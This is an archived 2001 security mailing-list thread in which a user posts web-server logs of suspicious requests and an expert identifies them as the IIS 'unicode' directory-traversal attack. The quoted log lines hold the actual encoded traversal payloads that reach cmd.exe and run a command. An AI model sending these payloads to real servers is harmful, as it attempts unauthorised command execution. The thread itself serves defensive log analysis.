[Dshield] win32 exploit?

Johannes B. Ullrich jullrich at euclidian.com
Sat Aug 4 03:51:02 GMT 2001


Looks like regular 'unicode' attack.

On Fri, 3 Aug 2001, Joseph Shraibman wrote:

> Does anyone know what this is?
>
> 216.26.139.35 - - [03/Aug/2001:13:24:59 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 200 201 "-" "-"
>
> [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> bogus_host_without_reverse_dns 207.213.220.70 - - [06/Apr/2001:22:21:26
> -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 344
> bogus_host_without_reverse_dns 128.121.2.139 - - [16/Jun/2001:18:14:33
> -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 -
> error_log:[Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70]
> File does not exist:
> /local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> error_log:[Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File
> does not exist:
> /local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> error_log:[Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File
> does not exist:
> /local/www/apps253/apps/scripts/..Á?../winnt/system32/cmd.exe
> error_log:[Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File
> does not exist:
> /local/www/apps253/apps/scripts/..%5c%5c../winnt/system32/cmd.exe
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332 "-" "-"
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332 "-" "-"
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> "-" "-"
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
> [Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.exe
> [Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cmd.exe
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328 "-" "-"
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328 "-" "-"
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-"
> "-"
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> "-" "-"
> [Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.exe
> [Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cmd.exe
>
>
>

-- 
-------
jullrich at sans.org                    Join http://www.DShield.org
                                     Distributed Intrusion Detection System





More information about the list mailing list